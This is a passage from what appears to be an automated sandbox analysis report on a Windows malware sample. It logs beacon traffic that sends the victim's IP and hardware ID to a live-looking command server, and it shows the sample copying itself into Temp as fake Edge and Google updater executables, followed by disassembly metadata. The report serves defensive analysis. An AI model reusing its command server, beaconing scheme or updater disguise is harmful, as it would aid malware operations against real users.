2024-10-03 01:30:10 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:30:10 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9af4bmFfOoUyC0eNjTGoPtwMEIuG2N%2F4s0vVB0o3q0Pt1HdyYsWXkHzhuG06OCzybKYtX2UcWqUeF9awSfb0d%2Fn%2FKQDfrxEOYLmVTCY7%2BBdhX%2Fps1Dr96oXecnK%2FWR3v0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a550d057274-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	52975	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:11 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:11 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:30:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:12 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwSJRVdHdsRyqW1di9xCuwn7XuUAKrK%2FZUixekig4uChXB9foF1YIt6ouBaUrxcSZssGoETxz7vzMrr4YOSwKPPU%2Bj6Q8fsdnQVtOGGJ9LILdNllGyITP4uiSuTGeZdI0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a5e8caf1881-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	52976	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:13 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:30:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:13 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:30:13 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn8BX9E4YeIQpe%2BepDgHsokZU77fk9fvY35mzHP4ywgw18OSuks%2FUxZMwHsV%2FkYwvMRO67CB95HpnaeMnK5i8Td05dM%2BLyFJZLQtWConI9BEyBXh1z2%2Bf4LyYaxH6YHroQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a6a7a427290-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	52978	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:20 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:20 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:30:21 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pV5ec%2BcONTcWTwfvJih5CJfmvlUnhLfnNUUQ3tjFK5%2FWrjkAixZZFGbDUHfQ68EB49Q%2BMMqTe3uxiP1%2Bdu9089GMUbNlKFVu7lSAKw8CGsnh2Rra1wZwb7Np2yrWkN1N1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a973c1842ac-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	52979	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:21 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:21 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:30:22 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9pf4VuhIBXesCAmOiW0wtG5Tct6Iz%2BlsMlnfjZbS39DaxivHU7mPbo2vYwahY7U2cjkDI5GZ6Azh%2FYMTbgDLxWfkExGRna4HnfsYu05fi3bfccs84xBDgyMXqRd7k7W0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92a9dffce4343-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	52980	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:22 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:30:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:30:22 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:30:23 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oT7DgCe3ADTGvfdOpJ5Tlpc%2FxLkWeIwE8lSWdkfzco6cDZax7taFie%2FtRJJO1KRZhyWb7l1n%2B0HtUPfzLcadzTbK%2BRDZYM1eptjfFxWH%2BPJcV0MxSzNJWHFTib%2FceUylbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92aa4adeb42ac-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	52981	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:30:53 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:30:53 UTC	25	IN	HTTP/1.1 100 Continue

Target ID:	0
Start time:	21:26:10
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x590000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:26:10
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x150000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs Detection: 24%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	21:26:11
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
Imagebase:	0x8a0000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs Detection: 24%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	21:26:23
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x9f0000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:26:23
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932
Imagebase:	0x960000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:26:31
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Imagebase:	0x9a0000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:26:31
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932
Imagebase:	0x960000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:26:39
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Imagebase:	0x20000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:26:40
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932
Imagebase:	0x960000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:26:47
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Imagebase:	0x260000
File size:	243'888 bytes
MD5 hash:	F37E0267C53AE8E94FE38E87524B8C45
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:26:48
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932
Imagebase:	0x960000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00FE1098 Relevance: 12.4, Strings: 4, Instructions: 7414COMMON

Download Yara Rule

Strings

;.%, xrefs: 00FE4C97
&03, xrefs: 00FE24ED
9!7J, xrefs: 00FE741B
j'R, xrefs: 00FE414F

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: j'R$&03$9!7J$;.%
API String ID: 0-3501266285
Opcode ID: d0e5cebf1f31d4dd2c9ed88e4e7997b67f68b790062b1f0044695b3a7cfb152b
Instruction ID: 13317df623229b213eb121e37c3a391a18a95b1717f9eadae40400dff8983260
Opcode Fuzzy Hash: d0e5cebf1f31d4dd2c9ed88e4e7997b67f68b790062b1f0044695b3a7cfb152b
Instruction Fuzzy Hash: 14E31975E112698FDB64DF68C880A9DB7B6FB88300F5145EAD809E7351DB31AE81CF90

Function 04DF0040 Relevance: 2.9, Strings: 1, Instructions: 1656COMMON

Download Yara Rule

Strings

K?, xrefs: 04DF1A26

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: K?
API String ID: 0-2319294075
Opcode ID: 2e5d93789519bcbfd9f8a259f10fb3f0108d4f693d607ec8949093d51d579025
Instruction ID: c92d7a1bf26e167e6b1517795fb30c59598223354c33fa9876c4d16577306c5f
Opcode Fuzzy Hash: 2e5d93789519bcbfd9f8a259f10fb3f0108d4f693d607ec8949093d51d579025
Instruction Fuzzy Hash: 6EE24B75B00219CFDB64DF69CC84A99B7B2BF88300F1581A9E609AB361DB71ED85CF50

Function 00FE9198 Relevance: 1.8, Strings: 1, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1O^, xrefs: 00FE9443

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: 1O^
API String ID: 0-971112054
Opcode ID: 26d7fde7e3e8375e8ac1c6b4a87eccddee3b892a506100d76c8e93d9764778b4
Instruction ID: 2354c023db66cc3f8edb9b9421d28d38f78816328827265e17fde73d98512361
Opcode Fuzzy Hash: 26d7fde7e3e8375e8ac1c6b4a87eccddee3b892a506100d76c8e93d9764778b4
Instruction Fuzzy Hash: F7128B76E042589FCB14DFAAD88069DB7F2FF89310B14816AE825E7350DB789E45CF90

Function 00FEB7B8 Relevance: 1.6, Strings: 1, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9x=], xrefs: 00FEB942

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: 9x=]
API String ID: 0-2310485032
Opcode ID: 967f6b4c36d97c2dfd88d2c4f611ddb3022889438fd8c89982dd268a8aa5e22f
Instruction ID: ed58814331bcb01430e89ee9cc14f81f4727aeda3aa2b8f82bb80e151b672dda
Opcode Fuzzy Hash: 967f6b4c36d97c2dfd88d2c4f611ddb3022889438fd8c89982dd268a8aa5e22f
Instruction Fuzzy Hash: 2CD19076B105208F8B44EF6DD89892EB7E6EF8D71031545A8E90ADB3A1DF70DC01DBA1

Function 04DF61F8 Relevance: 1.6, APIs: 1, Instructions: 91
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04DF62B3

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 792a1d36ba3e6c81b59dd5c6a16bb673018f5df0bea7af518e1ccfc7a7cb61d3
Instruction ID: 15b27baba1082b424e20efc1b59ddb6fa16c303d9a7747dd4efb370fc3acb30f
Opcode Fuzzy Hash: 792a1d36ba3e6c81b59dd5c6a16bb673018f5df0bea7af518e1ccfc7a7cb61d3
Instruction Fuzzy Hash: FE317A719043899FDB11CFA9C890ADEBFF0FF49320F10846EE544AB252C774A915CBA1

Function 04DF5D49 Relevance: 1.6, APIs: 1, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04DF5DD9

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 61f3e8441d17c7dae237965de02cbfc683891f46acb7acba31911a267301474c
Instruction ID: 6ca1e00e6a4f8232919332b29046dd5f736e3aefe37b5b5571bee805560cb0df
Opcode Fuzzy Hash: 61f3e8441d17c7dae237965de02cbfc683891f46acb7acba31911a267301474c
Instruction Fuzzy Hash: 0421E2B1D013499FDB10CFAAD984ADEFBF5BF48310F20842AE519A7240D779A910CBA5

Function 04DF5D50 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04DF5DD9

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e5428975b7489f539eed1580420fc41aa119309f30530aa2793aa9fd3a2e4f80
Instruction ID: acec27a0d57b0cd29fc47d90f00264080c8c9f4bc3bf67a338e8db8285ccfcd3
Opcode Fuzzy Hash: e5428975b7489f539eed1580420fc41aa119309f30530aa2793aa9fd3a2e4f80
Instruction Fuzzy Hash: A021F2B1D013499FDB10CFAAD984ADEFBF5FF48310F20842AE519A7200C775A910CBA1

Function 04DF6230 Relevance: 1.6, APIs: 1, Instructions: 61
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04DF62B3

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b3f8c32180870c840ba9d3d75931d8e0740f8cca6aaeea2d118afeb42e2ff0f5
Instruction ID: 5967361e5ba1fac009ba831edb57770406670fddd8ab185b905f9755e461383a
Opcode Fuzzy Hash: b3f8c32180870c840ba9d3d75931d8e0740f8cca6aaeea2d118afeb42e2ff0f5
Instruction Fuzzy Hash: 8021E4B59003499FDB10DFAAC885ADEFBF5FF48320F10841AE519A7210C775A954CBA5

Function 04DF2DF0 Relevance: 1.5, Strings: 1, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9R-l, xrefs: 04DF2EDD

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: 9R-l
API String ID: 0-2809259381
Opcode ID: 208674c127bf0fff5b3148b216fbcbe839b0c1e7fbdfa968e5406859cf6cb1a1
Instruction ID: e19a607196016d8cf9365e9d9c875c1c983273990bc98d07d82f908ef4ae5bd3
Opcode Fuzzy Hash: 208674c127bf0fff5b3148b216fbcbe839b0c1e7fbdfa968e5406859cf6cb1a1
Instruction Fuzzy Hash: 8FB16C35B103098FCB14DFA9D884A9DBBF2BF88300B668169E915AB365DB71EC45CB40

Function 00FE9187 Relevance: 1.5, Strings: 1, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1O^, xrefs: 00FE9443

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: 1O^
API String ID: 0-971112054
Opcode ID: b9086d55abfde6d41993280c85ecb94fd4f7cd008f20f28ea90c2034f03acc5c
Instruction ID: 248351298935ff4a83531c89c112c2fcd88ba0b90f474f8592b6be48d3b218d4
Opcode Fuzzy Hash: b9086d55abfde6d41993280c85ecb94fd4f7cd008f20f28ea90c2034f03acc5c
Instruction Fuzzy Hash: BDB12775E00248AFCB58DFAAD455AADB7F2FF89300B14C1AAD825E7350E7789A01CF10

Function 04DF2DEC Relevance: 1.5, Strings: 1, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9R-l, xrefs: 04DF2EDD

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID: 9R-l
API String ID: 0-2809259381
Opcode ID: a63d495df09ca22d6fa33b7aa1917520eb5ceea5a96be54a5d234c0faa48963b
Instruction ID: 07fda334eea523748d50c1c31f0cfc426e2b5569fe4d6aaa9249b19cf08a41ec
Opcode Fuzzy Hash: a63d495df09ca22d6fa33b7aa1917520eb5ceea5a96be54a5d234c0faa48963b
Instruction Fuzzy Hash: 36916D35F103098FCB14DFA9D88499DB7F2BF88300B26816AE915EB365EB71AC45CB50

Function 00FEC1A9 Relevance: 1.4, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3G., xrefs: 00FEC1DA

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: 3G.
API String ID: 0-3978388015
Opcode ID: abc8ba0b983c4ffe7aeeb9fddf643f0a35bdb4ec7b110a52a19d6bd521bd81cf
Instruction ID: b24ef9210d9efecb455303ca5a09edf5fadfc069bedcbad13fa9c0a29f725863
Opcode Fuzzy Hash: abc8ba0b983c4ffe7aeeb9fddf643f0a35bdb4ec7b110a52a19d6bd521bd81cf
Instruction Fuzzy Hash: 5451C573E102248FCB18DF69C85456D77A2AF8976175641A9EC06FB361DA79CC02CBD0

Function 00FEC1B8 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3G., xrefs: 00FEC1DA

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID: 3G.
API String ID: 0-3978388015
Opcode ID: f604c16d97fefb84b6b6325e772b08e14ab92c74c3e32286230dfd71ee473bf1
Instruction ID: 4cd72b830d1da1d3215ea6c338ee0c26d5c925db86118e4f3ec2ea926b0627fd
Opcode Fuzzy Hash: f604c16d97fefb84b6b6325e772b08e14ab92c74c3e32286230dfd71ee473bf1
Instruction Fuzzy Hash: 6251E473F102248FCB18DFA9C89459D76E2AF8872175641A9EC06FB351DA79CC01CBD0

Function 04DF76B0 Relevance: .6, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd6042e3b9b4ba53a47b204ed1bf523563a8dc575a0fd87ed6dad9f2b2faac3
Instruction ID: cd31bf98d124686797520537716d22b515c7cf79f2c2e30d138efb5598f8eae5
Opcode Fuzzy Hash: acd6042e3b9b4ba53a47b204ed1bf523563a8dc575a0fd87ed6dad9f2b2faac3
Instruction Fuzzy Hash: 6C425B75A00605CFCB24CF58C9849AEBBF2FF88310B168A69D55A9B751D730F982CF90

Function 00FE9A30 Relevance: .5, Instructions: 503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc5eb765b2ab078397513f7306a8a3884f84de8be861569c8e7a4c542b80f75
Instruction ID: 06e796b08d59cbf2a1cacb29ec45e328bfb068d10c8753c8a1f8af42c33f1149
Opcode Fuzzy Hash: 5dc5eb765b2ab078397513f7306a8a3884f84de8be861569c8e7a4c542b80f75
Instruction Fuzzy Hash: 2802E171B043558FCB14DF69D8D069EBBF2BF89300B5581AAE409DB362DBB4AC46CB50

Function 00FEA604 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Similarity

API ID:
String ID:
